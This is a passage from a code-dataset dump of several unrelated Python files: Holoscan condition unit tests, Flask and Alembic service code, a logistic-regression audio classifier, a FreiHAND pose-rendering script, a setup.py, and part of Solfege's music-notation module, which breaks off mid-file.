\"nvidia::gxf::BooleanSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n def test_enable_tick(self, app, capfd):\n cond = BooleanCondition(fragment=app, name=\"boolean\", enable_tick=True)\n cond.disable_tick()\n assert not cond.check_tick_enabled()\n\n cond.enable_tick()\n assert cond.check_tick_enabled()\n\n def test_default_initialization(self, app):\n BooleanCondition(app)\n\n def test_positional_initialization(self, app):\n BooleanCondition(app, False, \"bool\")\n\n\nclass TestCountCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = CountCondition(fragment=app, name=\"count\", count=100)\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::CountSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n def test_count(self, app, capfd):\n cond = CountCondition(fragment=app, name=\"count\", count=100)\n cond.count = 10\n assert cond.count == 10\n\n def test_default_initialization(self, app):\n CountCondition(app)\n\n def test_positional_initialization(self, app):\n CountCondition(app, 100, \"counter\")\n\n\nclass TestDownstreamMessageAffordableCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = DownstreamMessageAffordableCondition(\n fragment=app, name=\"downstream_affordable\", min_size=10\n )\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::DownstreamReceptiveSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n def test_default_initialization(self, app):\n DownstreamMessageAffordableCondition(app)\n\n def test_positional_initialization(self, app):\n DownstreamMessageAffordableCondition(app, 4, \"affordable\")\n\n\nclass TestMessageAvailableCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = MessageAvailableCondition(\n fragment=app, name=\"message_available\", min_size=1, front_stage_max_size=10\n )\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::MessageAvailableSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n def test_default_initialization(self, app):\n MessageAvailableCondition(app)\n\n def test_positional_initialization(self, app):\n MessageAvailableCondition(app, 1, 4, \"available\")\n\n\nclass TestPeriodicCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = PeriodicCondition(fragment=app, name=\"periodic\", recess_period=100)\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::PeriodicSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n @pytest.mark.parametrize(\n \"period\",\n [\n 1000,\n datetime.timedelta(minutes=1),\n datetime.timedelta(seconds=1),\n datetime.timedelta(milliseconds=1),\n datetime.timedelta(microseconds=1),\n ],\n )\n def test_periodic_constructors(self, app, capfd, period):\n cond = PeriodicCondition(fragment=app, name=\"periodic\", recess_period=period)\n if isinstance(period, int):\n expected_ns = period\n else:\n expected_ns = int(period.total_seconds() * 1_000_000_000)\n\n assert cond.recess_period_ns() == expected_ns\n\n @pytest.mark.parametrize(\n \"period\",\n [\n 1000,\n datetime.timedelta(minutes=1),\n datetime.timedelta(seconds=1),\n datetime.timedelta(milliseconds=1),\n datetime.timedelta(microseconds=1),\n ],\n )\n def test_recess_period_method(self, app, capfd, period):\n cond = PeriodicCondition(fragment=app, name=\"periodic\", recess_period=1)\n cond.recess_period(period)\n if isinstance(period, int):\n expected_ns = period\n else:\n expected_ns = int(period.total_seconds() * 1_000_000_000)\n\n assert cond.recess_period_ns() == expected_ns\n\n def test_positional_initialization(self, app):\n PeriodicCondition(app, 100000, \"periodic\")\n\n def test_invalid_recess_period_type(self, app):\n with pytest.raises(TypeError):\n PeriodicCondition(app, recess_period=\"100s\", name=\"periodic\")\n\n\n####################################################################################################\n# Test Ping app with no conditions on Rx operator\n####################################################################################################\n\n\nclass PingTxOpNoCondition(Operator):\n def __init__(self, *args, **kwargs):\n self.index = 0\n # Need to call the base class constructor last\n super().__init__(*args, **kwargs)\n\n def setup(self, spec):\n spec.output(\"out1\")\n spec.output(\"out2\")\n\n def compute(self, op_input, op_output, context):\n self.index += 1\n if self.index == 1:\n print(f\"#TX{self.index}\") # no emit\n elif self.index == 2:\n print(f\"#T1O{self.index}\") # emit only out1\n op_output.emit(self.index, \"out1\")\n elif self.index == 3:\n print(f\"#T2O{self.index}\") # emit only out2 (Entity object)\n entity = Entity(context)\n op_output.emit(entity, \"out2\")\n elif self.index == 4:\n print(f\"#TO{self.index}\") # emit both out1 and out2 (out2 is Entity object)\n op_output.emit(self.index, \"out1\")\n entity = Entity(context)\n op_output.emit(entity, \"out2\")\n else:\n print(f\"#TX{self.index}\") # no emit\n\n\nclass PingRxOpNoInputCondition(Operator):\n def __init__(self, *args, **kwargs):\n self.index = 0\n # Need to call the base class constructor last\n super().__init__(*args, **kwargs)\n\n def setup(self, spec):\n # No input condition\n spec.input(\"in1\").condition(ConditionType.NONE)\n spec.input(\"in2\").condition(ConditionType.NONE)\n\n def compute(self, op_input, op_output, context):\n self.index += 1\n value1 = op_input.receive(\"in1\")\n value2 = op_input.receive(\"in2\")\n\n # Since value can be an empty dict, we need to check for None explicitly\n if value1 is not None and value2 is None:\n print(f\"#R1O{self.index}\")\n elif value1 is None and value2 is not None:\n print(f\"#R2O{self.index}\")\n elif value1 is not None and value2 is not None:\n print(f\"#RO{self.index}\")\n else:\n print(f\"#RX{self.index}\")\n\n\nclass PingRxOpNoInputConditionApp(Application):\n def compose(self):\n tx = PingTxOpNoCondition(self, CountCondition(self, 5), name=\"tx\")\n rx = PingRxOpNoInputCondition(self, CountCondition(self, 5), name=\"rx\")\n self.add_flow(tx, rx, {(\"out1\", \"in1\"), (\"out2\", \"in2\")})\n\n\ndef test_ping_no_input_condition(capfd):\n app = PingRxOpNoInputConditionApp()\n app.run()\n\n captured = capfd.readouterr()\n\n sequence = (line[1:] if line.startswith(\"#\") else \"\" for line in captured.out.splitlines())\n # The following sequence is expected:\n # TX1->RX1, T1O2-> R1O2, T2O3->R2O3, TO4->RO4, TX5->RX5\n assert \"\".join(sequence) == \"TX1RX1T1O2R1O2T2O3R2O3TO4RO4TX5RX5\"\n\n error_msg = captured.err.lower()\n assert \"error\" not in error_msg\n assert \"warning\" not in error_msg\n","repo_name":"nvidia-holoscan/holoscan-sdk","sub_path":"python/tests/unit/test_conditions.py","file_name":"test_conditions.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"54"} +{"seq_id":"4319412342","text":"from yome import Session, Base\n\nimport pytest\nfrom os import remove\nimport logging\nfrom sqlalchemy import create_engine\nfrom os.path import join, dirname, realpath\n\ndirectory = dirname(realpath(__file__))\ntest_db_filepath = join(directory, '..', 'yome_test.db')\n\n@pytest.fixture(scope='session')\ndef test_db(request):\n try:\n remove(test_db_filepath)\n except FileNotFoundError:\n pass\n engine = create_engine(f'sqlite:///{test_db_filepath}')\n Base.metadata.create_all(engine)\n Session.configure(bind=engine)\n\n@pytest.fixture(scope='session')\ndef session(request, test_db):\n \"\"\"Make a session\"\"\"\n def teardown():\n Session.close_all()\n request.addfinalizer(teardown)\n return Session()\n","repo_name":"zakandrewking/y-ome","sub_path":"yome/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"27658385092","text":"\"\"\"\nThis module contains all of Resources for the Customer API\n\"\"\"\nimport json\nfrom flask import abort, request, make_response\nfrom flask_restful import Resource\nfrom flask_api import status\nfrom werkzeug.exceptions import BadRequest\nfrom service import app, api, apii, ns, Customer_model\nfrom service.models import Customer, DataValidationError\n\n######################################################################\n# PATH: /pets/{id}\n######################################################################\n\n@ns.route('/')\n@ns.param('customer_id', 'The customer identifier')\nclass CustomerResource(Resource):\n \"\"\"\n CustomerResource class\n\n Allows the manipulation of a single Customer\n GET /customers/{id} - Returns a Customer with the id\n PUT /customers/{id} - Updates a Customer with the id\n DELETE /customers/{id} - Deletes a Customer with the id\n \"\"\"\n\n @ns.doc('get_customers')\n @ns.response(404, 'Customer not found')\n @ns.marshal_with(Customer_model)\n def get(self, customer_id):\n \"\"\"\n Retrieve a single Customer\n \"\"\"\n app.logger.info('Finding a Customer with id [{}]'.format(customer_id))\n customer = Customer.find(customer_id)\n if customer:\n message = customer.serialize()\n return_code = status.HTTP_200_OK\n else:\n message = {'error': 'Customer with id: %s was not found' % str(customer_id)}\n return_code = status.HTTP_404_NOT_FOUND\n return message, return_code\n\n\n @ns.doc('update_customer')\n @ns.response(404, 'Customer not found')\n @ns.response(400, 'The posted Customer data was not valid')\n @ns.expect(Customer_model)\n @ns.marshal_with(Customer_model)\n def put(self, customer_id):\n \"\"\"\n Update a single Customer\n \"\"\"\n app.logger.info('Updating a Customer with id [{}]'.format(customer_id))\n\n content_type = request.headers.get('content_type')\n\n if not content_type or content_type != 'application/json':\n abort(status.HTTP_400_BAD_REQUEST, \"No Content-Type set\")\n\n customer = Customer.find(customer_id)\n if not customer:\n abort(status.HTTP_404_NOT_FOUND, \"Customer with id '{}' was not found.\".format(customer_id))\n\n customer_info = request.get_json()\n customer_info.pop(\"_id\", None)\n try:\n customer.deserialize(customer_info)\n except DataValidationError as error:\n raise BadRequest(str(error))\n\n customer._id = customer_id\n customer.save()\n\n message = customer.serialize()\n return_code = status.HTTP_200_OK\n return message, return_code\n\n @ns.doc('delete_customers')\n @ns.response(204, 'Customer deleted')\n def delete(self, customer_id):\n \"\"\"\n Delete a Customer\n \"\"\"\n app.logger.info('Deleting a Customer with id [{}]'.format(customer_id))\n customer = Customer.find(customer_id)\n if customer:\n customer.delete()\n return '', status.HTTP_204_NO_CONTENT\n\n######################################################################\n# DELETE ALL PET DATA (for testing only)\n######################################################################\n @app.route('/customers/reset', methods=['DELETE'])\n def customers_reset():\n \"\"\" Removes all customers from the database \"\"\"\n Customer.remove_all()\n return '', status.HTTP_204_NO_CONTENT\n","repo_name":"devops-customers-18/customers","sub_path":"service/resources/customer_resource.py","file_name":"customer_resource.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73415845283","text":"__author__ = 'Yule'\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model, datasets\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\n\n\n# Maximum number of iterations. Continue until this limit, or when error change is below tol.\nmax_iter = 500\ntol = 0.00001\n\n# Step size for gradient descent.\neta = 0.5\n#MFCC starts from 874, ends at 886.\nStart=874\nEnd=886\nTarget=1947\nsecond=20000\nPercentage_train=0.7\nDATASET_PATH_BASE = '/Users/Yule/Documents/Machine Learning/Project/data'\nms_array = [5000, 10000, 20000, 30000]\nlocation = ['Corner Stone', 'Lecture room', 'busloop', 'lake', 'Dinning hall', 'aq', 'gym', 'lib' ]\ndef logistic_regression(second,Percentage_train):\n second_path_base = DATASET_PATH_BASE + '/' + str(second) + '/'\n data_path = second_path_base + location[0] + '/data_shuffle.csv'\n data = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n X = data.values[0:int(Percentage_train*len(data)),Start:End+1]\n T = data.values[0:int(Percentage_train*len(data)),Target]\n\n for l in location[1:8]:\n data_path = second_path_base + l + '/data_shuffle.csv'\n data = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n #shuffle the dataframe\n #data=data.reindex(np.random.permutation(data.index))\n x = data.values[0:int(Percentage_train*len(data)),Start:End+1]\n t = data.values[0:int(Percentage_train*len(data)),Target]\n X=np.concatenate((X, x), axis=0)\n T=np.concatenate((T, t), axis=0)\n\n\n\n logreg = linear_model.LogisticRegression(C=1e5)\n # we create an instance of Neighbours Classifier and fit the data.\n logreg.fit(X, T)\n\n data_path = second_path_base + location[0] + '/data_shuffle.csv'\n data_test = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n X_test = data_test.values[int(Percentage_train*len(data_test)):,Start:End+1]\n T_test = data_test.values[int(Percentage_train*len(data_test)):,Target]\n\n for l in location[1:8]:\n data_path = second_path_base + l + '/data_shuffle.csv'\n data_test = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n\n x = data_test.values[int(Percentage_train*len(data_test)):,Start:End+1]\n t = data_test.values[int(Percentage_train*len(data_test)):,Target]\n X_test=np.concatenate((X_test, x), axis=0)\n T_test=np.concatenate((T_test, t), axis=0)\n\n\n\n print(\"Total training accuracy:\",logreg.score(X,T))\n print(\"Total test accuracy:\",logreg.score(X_test,T_test))\n logreg = linear_model.LogisticRegression(C=1e5)\n # we create an instance of Neighbours Classifier and fit the data.\n T_pred=logreg.fit(X, T).predict(X_test)\n\n cnf_matrix = confusion_matrix(T_test, T_pred)\n print(\"Confusion Matrix:\\n%s\" %cnf_matrix)\n print(\"Classfication report:\\n%s\" %classification_report(T_test, T_pred))\n \n print(\"Accuracy for each location:\")\n for l in location:\n data_path = second_path_base + l + '/data_shuffle.csv'\n data_test = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n X_test = data_test.values[int(Percentage_train*len(data_test)):,Start:End+1]\n T_test = data_test.values[int(Percentage_train*len(data_test)):,Target]\n print(l,\":\",logreg.score(X_test,T_test))\n\n\nlogistic_regression(second,Percentage_train)\n","repo_name":"yulew/MechineLearningProject","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38760472323","text":"from flask import Flask, render_template\nimport requests\napp = Flask(__name__)\n\n@app.route('/')\ndef homepage():\n return render_template('index.html')\n\n@app.route('/blog')\ndef blog():\n response = requests.get('https://api.npoint.io/49943cbdc8ee3ec5a615').json()\n return render_template('blog.html', title=response['title'], blog=response['blog'], link=response['link'])\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"KarolinaZawisza/blog-template","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35269145473","text":"import os\nfrom setuptools import setup, find_packages\n\n\ndef read_version():\n for line in open(os.path.join('ncbi_accession_download', '__init__.py'), 'r'):\n if line.startswith('__version__'):\n return line.split('=')[-1].strip().strip(\"'\")\n\n\nsetup(\n name=\"ncbi_accession_download\",\n version=read_version(),\n author=\"Honeyu Chen\",\n author_email=\"eacochen@163.com\",\n description=\"Fast, Download mixed ncbi accession number in a batch way.\",\n\n url=\"https://github.com/EacoChen/ncbi_download\",\n packages=find_packages(),\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Natural Language :: Chinese (Simplified)',\n 'Operating System :: Microsoft :: Windows :: Windows 10'\n ],\n \n install_requires = ['requests >= 2.24.0',\n 'tqdm >= 4.46.1',\n 'biopython >= 1.77',\n 'beautifulsoup4 >= 4.9.1'],\n \n python_requires='>=3.7',\n \n entry_points={\n 'console_scripts': [\n 'ncbi-acc-download=ncbi_accession_download.core:main',\n 'nad=ncbi_accession_download.core:main'\n ],\n },\n\n)","repo_name":"EacoChen/ncbi_download","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"36856369212","text":"import cv2\nimport json\nimport copy\nfrom pycocotools.coco import COCO\nimport os.path as osp\nfrom tqdm import tqdm\nimport torch\nimport smplx\nfrom glob import glob\nimport os\nos.environ[\"PYOPENGL_PLATFORM\"] = \"egl\"\nimport pyrender\nimport trimesh\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nCOLORMAP = {\n \"thumb\": {\"ids\": [0, 1, 2, 3, 4], \"color\": \"g\"},\n \"index\": {\"ids\": [0, 5, 6, 7, 8], \"color\": \"c\"},\n \"middle\": {\"ids\": [0, 9, 10, 11, 12], \"color\": \"b\"},\n \"ring\": {\"ids\": [0, 13, 14, 15, 16], \"color\": \"m\"},\n \"little\": {\"ids\": [0, 17, 18, 19, 20], \"color\": \"r\"},\n}\n\ndef load_data():\n \n data_split = 'train'\n data_path = '/root/dataset/freihand'\n #human_bbox_root_dir = osp.join('..', 'data', 'FreiHAND', 'rootnet_output', 'bbox_root_freihand_output.json')\n \n if data_split == 'train':\n db = COCO(osp.join(data_path, 'moon/freihand_train_coco.json'))\n with open(osp.join(data_path, 'moon/freihand_train_data.json')) as f:\n data = json.load(f)\n \n else:\n db = COCO(osp.join(data_path, 'moon/freihand_eval_coco.json'))\n with open(osp.join(data_path, 'moon/freihand_eval_data.json')) as f:\n data = json.load(f)\n #print(\"Get bounding box and root from \" + human_bbox_root_dir)\n bbox_root_result = {}\n #with open(human_bbox_root_dir) as f:\n # annot = json.load(f)\n #for i in range(len(annot)):\n # bbox_root_result[str(annot[i]['image_id'])] = {'bbox': np.array(annot[i]['bbox']), 'root': np.array(annot[i]['root_cam'])}\n\n datalist = []\n for aid in tqdm(db.anns.keys()):\n ann = db.anns[aid]\n image_id = ann['image_id']\n img = db.loadImgs(image_id)[0]\n img_path = osp.join(data_path, img['file_name'])\n img_shape = (img['height'], img['width'])\n db_idx = str(img['db_idx'])\n\n if data_split == 'train':\n cam_param, mano_param = data[db_idx]['cam_param'], data[db_idx]['mano_param']\n mano_param['hand_type'] = 'right' # FreiHAND only contains right hand\n #bbox = process_bbox(np.array(ann['bbox']), img['width'], img['height'])\n #if bbox is None: continue\n #render(mano_param, cam_param, img, img_path)\n joint_3d = data[db_idx]['joint_3d']\n joint_3d = np.array(joint_3d)\n joint_2d = joint_3d[:, :2]\n \n\n datalist.append({\n 'img_path': img_path,\n 'img_shape': img_shape,\n #'bbox': bbox,\n 'cam_param': cam_param,\n 'mano_param': mano_param})\n else:\n cam_param = data[db_idx]['cam_param']\n #bbox = bbox_root_result[str(image_id)]['bbox'] # bbox should be aspect ratio preserved-extended. It is done in RootNet.\n root_joint_depth = bbox_root_result[str(image_id)]['root'][2]\n\n datalist.append({\n 'img_path': img_path,\n 'img_shape': img_shape,\n #'bbox': bbox,\n 'root_depth': root_joint_depth,\n 'cam_param': cam_param})\n\ndef projectPoints(xyz, K):\n \"\"\"\n Projects 3D coordinates into image space.\n Function taken from https://github.com/lmb-freiburg/freihand\n \"\"\"\n xyz = np.array(xyz)\n K = np.array(K)\n uv = np.matmul(K, xyz.T).T\n return uv[:, :2] / uv[:, -1:]\n\ndef load_data2():\n \n data_split = 'train'\n data_path = '/root/dataset/freihand'\n xyz_path = 'training_xyz.json'\n k_path = 'training_K.json'\n #human_bbox_root_dir = osp.join('..', 'data', 'FreiHAND', 'rootnet_output', 'bbox_root_freihand_output.json')\n \n if data_split == 'train':\n with open(osp.join(data_path, xyz_path)) as f:\n xyz = json.load(f)\n with open(osp.join(data_path, k_path)) as f:\n k = json.load(f)\n \n for idx in tqdm(range(len(xyz))):\n keypoints = projectPoints(xyz[idx], k[idx])\n #plt.figure(figsize=(2.24, 2.24), dpi=100)\n empty_image = np.zeros([224, 224, 3])\n plt.imshow(empty_image)\n plt.scatter(keypoints[:, 0], keypoints[:, 1], c=\"k\", alpha=1)\n for finger, params in COLORMAP.items():\n plt.plot(\n keypoints[params[\"ids\"], 0],\n keypoints[params[\"ids\"], 1],\n params[\"color\"],\n )\n plt.axis('off')\n save_folder = '/root/dataset/freihand/training/pose'\n os.makedirs(save_folder, exist_ok=True)\n save_path = os.path.join(save_folder, str(idx).zfill(8) + '.jpg')\n plt.savefig(save_path, bbox_inches='tight', pad_inches=0, dpi=60.7)\n plt.close()\n #plt.savefig('test_2dpose.png', pad_inches=0)\n \n #fig = plt.gcf()\n #fig.canvas.draw()\n #image_array = np.array(fig.canvas.renderer.buffer_rgba())\n #image_cv2 = cv2.cvtColor(image_array, cv2.COLOR_RGBA2BGR)\n #cv2.imwrite('test_2dpose.png', image_cv2)\n \n \nif __name__ == \"__main__\":\n #load_data()\n load_data2()\n","repo_name":"redorangeyellowy/hand_rendering","sub_path":"freihand_2dpose.py","file_name":"freihand_2dpose.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71575900323","text":"\"\"\"All models migration file\n\nRevision ID: a7c7fe6c0b87\nRevises: \nCreate Date: 2019-06-16 07:16:25.568017\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nimport depot\n# revision identifiers, used by Alembic.\nimport sa_types\n\nrevision = 'a7c7fe6c0b87'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('async_task',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('task_id', sa.String(length=64), nullable=True),\n sa.Column('payload', postgresql.JSONB(astext_type=sa.Text()), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_async_task_task_id'), 'async_task', ['task_id'], unique=False)\n op.create_table('bulk_csv_upload',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('csv', depot.fields.sqlalchemy.UploadedFileField(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('product',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=256), nullable=False),\n sa.Column('sku', sa.String(length=256), nullable=False),\n sa.Column('description', sa.String(length=1024), nullable=False),\n sa.Column('status', sa.String(64), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_product_sku'), 'product', ['sku'], unique=True)\n op.create_index(op.f('ix_product_status'), 'product', ['status'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_product_status'), table_name='product')\n op.drop_index(op.f('ix_product_sku'), table_name='product')\n op.drop_table('product')\n op.drop_table('bulk_csv_upload')\n op.drop_index(op.f('ix_async_task_task_id'), table_name='async_task')\n op.drop_table('async_task')\n # ### end Alembic commands ###\n","repo_name":"impiyush83/import-large-dataset-file-to-db","sub_path":"migrations/versions/a7c7fe6c0b87_all_models_migration_file.py","file_name":"a7c7fe6c0b87_all_models_migration_file.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8257758016","text":"from __future__ import absolute_import\n\n#FIXME: voice1_lowest_ylinepos and stempos in the original parser.py\n# give some alignment we need to implement here too.\n\n# FIXME: I think the StemEngraver should take care of shifting of\n# noteheads. So I think it should be given the created NoteHeadEngravers\n# and then shift the notes.\n\nimport copy\nimport re\nimport weakref\n\nfrom solfege.mpd import _exceptions\nfrom solfege.mpd import const\nfrom solfege.mpd.rat import Rat\nfrom solfege.mpd.duration import Duration\nfrom solfege.mpd.musicalpitch import MusicalPitch\n\n#FIXME duplicate of code in Lexer\nre_melodic = re.compile(r\"\"\"(?x)\n ((?P[a-zA-Z]+)\n (?P[',]*))\n (?P[\\d]*)\n (?P\\.*)\"\"\", re.UNICODE)\n\nclass UnknownClefException(_exceptions.MpdException):\n def __init__(self, clef):\n _exceptions.MpdException.__init__(self)\n self.m_clef = clef\n def __str__(self):\n return \"'%s' is not a valid clef. Maybe a bug in your lessonfile?\" % self.m_clef\n\nclass Clef(object):\n # Use these constants to access the data in clefdata.\n SYM = 0\n # Which staff line should the clef be on lines 1 to 5. 1 is the lowest line\n LINE = 1\n # On which position in the staff is the middle C. 0 is the middle line\n # in the staff. Positive values are up, negative are down.\n POS = 2\n clefdata = {\n 'treble': ('G', 2, -6),\n 'violin': ('G', 2, -6),\n 'G': ('G', 2, -6),\n 'G2': ('G', 2, -6),\n 'french': ('G', 1, -8),\n #\n 'subbass': ('F', 5, 8),\n 'bass': ('F', 4, 6),\n 'F': ('F', 4, 6),\n 'varbaritone': ('F', 3, 4),\n #\n 'baritone': ('C', 5, 4),\n 'tenor': ('C', 4, 2),\n 'alto': ('C', 3, 0),\n 'C': ('C', 3, 0),\n 'mezzosoprano': ('C', 2, -2),\n 'soprano': ('C', 1, -4),\n }\n octaviation_re = re.compile(\"(?P[A-Za-z1-9]+)(?P([_^])(8|15))?$\")\n def __init__(self, clefname):\n m = self.octaviation_re.match(clefname)\n if not m:\n raise UnknownClefException(clefname)\n if m.group('name') not in self.clefdata:\n raise UnknownClefException(clefname)\n try:\n self.m_octaviation = {'_8': -7, '_15': -14, '^8': 7, '^15': 14,\n None: 0}[m.group('oct')]\n except KeyError:\n raise UnknownClefException(clefname)\n self.m_name = m.group('name')\n def get_symbol(self):\n return self.clefdata[self.m_name][self.SYM]\n def get_stafflinepos(self):\n return self.clefdata[self.m_name][self.LINE]\n def steps_to_ylinepos(self, steps):\n return 7-self.clefdata[self.m_name][self.POS] - steps + self.m_octaviation\n def an_to_ylinepos(self, an):\n def notename_to_ylinepos(n):\n n = MusicalPitch.new_from_notename(n)\n return self.steps_to_ylinepos(n.steps())\n if an[-2:] == 'es':\n l = 3\n h = -3\n else:\n l = 1\n h = -5\n i = notename_to_ylinepos(an)\n while i > l:\n an = an + \"'\"\n i = notename_to_ylinepos(an)\n while i < h:\n an = an + \",\"\n i = notename_to_ylinepos(an)\n return i\n\nclass TimeSignature(object):\n \"\"\"\n A TimeSignature is not the same as a Rat, because a Rat 4/4 can be\n simplified to 1/1, but time signatures should not. Also a time signature\n will probably know about preferred beaming. 4/4 vs 6/8 for example.\n \"\"\"\n __hash__ = None\n def __init__(self, a, b):\n self.m_num = a\n self.m_den = b\n def as_rat(self):\n return Rat(self.m_num, self.m_den)\n def __eq__(self, other):\n return self.m_num == other.m_num and self.m_den == other.m_den\n def __ne__(self, other):\n return not self.__eq__(other)\n def __repr__(self):\n return \"\" % (self.m_num, self.m_den)\n\nclass HasParent(object):\n def __init__(self, parent):\n self.set_parent(parent)\n def set_parent(self, parent):\n if parent:\n self.w_parent = weakref.ref(parent)\n w = self.w_parent\n # FIXME loop instead of ifelse, since the hierarcy might\n # get deeper.\n # FIXME should we allow for the try: clause??\n try:\n if isinstance(w(), Score):\n self.w_score = w\n elif type(w().w_parent()) == Score:\n self.w_score = w().w_parent\n else:\n assert isinstance(w().w_parent().w_parent(), Score)\n self.w_score = w().w_parent().w_parent\n except AttributeError:\n pass\n\n\nclass MusicElement(object):\n def __init__(self, duration):\n assert isinstance(duration, Duration)\n self.m_duration = duration\n def __repr__(self):\n return unicode(self.__class__)[:-2].replace(\"\" % (self.m_duration.as_mpd_string(), hex(id(self)))\n\nclass Note(MusicElement):\n __hash__ = None\n class Exception(Exception):\n pass\n def __deepcopy__(self, memo):\n n = Note(self.m_musicalpitch.clone(), self.m_duration.clone())\n n.m_tieinfo = self.m_tieinfo\n return n\n def __eq__(self, other):\n assert isinstance(other, Note)\n return (self.m_musicalpitch == other.m_musicalpitch and\n self.m_duration == other.m_duration)\n def __init__(self, musicalpitch, duration):\n MusicElement.__init__(self, duration)\n assert isinstance(musicalpitch, MusicalPitch)\n self.m_musicalpitch = musicalpitch\n self.m_tieinfo = None\n @staticmethod\n def new_from_string(string):\n s = string.strip()\n m = re_melodic.match(s)\n if m.end() < len(s) - 1:\n # FIXME: raise ValueError like rest\n raise Note.Exception(\"characters left in string\", string)\n return Note(\n MusicalPitch.new_from_notename(\"%s%s\" % (m.group('notename'),\n m.group('octave'))),\n Duration.new_from_string(\"%s%s\" % (m.group('len'), m.group('dots')))\n )\n def __repr__(self):\n return unicode(self.__class__)[:-2].replace(\"\" % (self.m_musicalpitch.get_octave_notename(), self.m_duration.as_mpd_string(), hex(id(self)))\n\nclass Rest(MusicElement):\n def __init__(self, duration):\n MusicElement.__init__(self, duration)\n def __deepcopy__(self, memo):\n return Rest(self.m_duration.clone())\n @staticmethod\n def new_from_string(string):\n return Rest(Duration.new_from_string(string))\n\nclass Skip(MusicElement):\n def __init__(self, duration):\n MusicElement.__init__(self, duration)\n def __deepcopy__(self, memo):\n return Skip(self.m_duration.clone())\n @staticmethod\n def new_from_string(string):\n return Skip(Duration.new_from_string(string))\n\nclass Stem(list):\n \"\"\"\n Every note belongs to a stem, even whole-notes.\n \"\"\"\n class NotEqualLengthException(Exception):\n \"\"\"\n Every notehead on a stem must have the same duration.\n \"\"\"\n pass\n def __init__(self, parent, elemlist, stemdir):\n assert isinstance(elemlist, list)\n assert stemdir in (const.UP, const.DOWN, const.BOTH)\n if [x for x in elemlist if x.m_duration != elemlist[0].m_duration]:\n raise self.NotEqualLengthException()\n list.__init__(self, elemlist)\n self.w_parent = weakref.ref(parent)\n for note in self:\n note.w_parent = weakref.ref(self)\n self.m_stemdir = stemdir\n self.m_beaminfo = None\n self.m_tupletinfo = None\n def __repr__(self):\n return \"\" % (str(list(self)), self.m_stemdir)\n\n\nclass Voice(HasParent):\n class CannotAddException(Exception):\n pass\n class NoChordsInRhythmStaffException(Exception):\n pass\n class NotUnisonException(Exception):\n pass\n class BarFullException(Exception):\n \"\"\"\n Exception raised if we try to 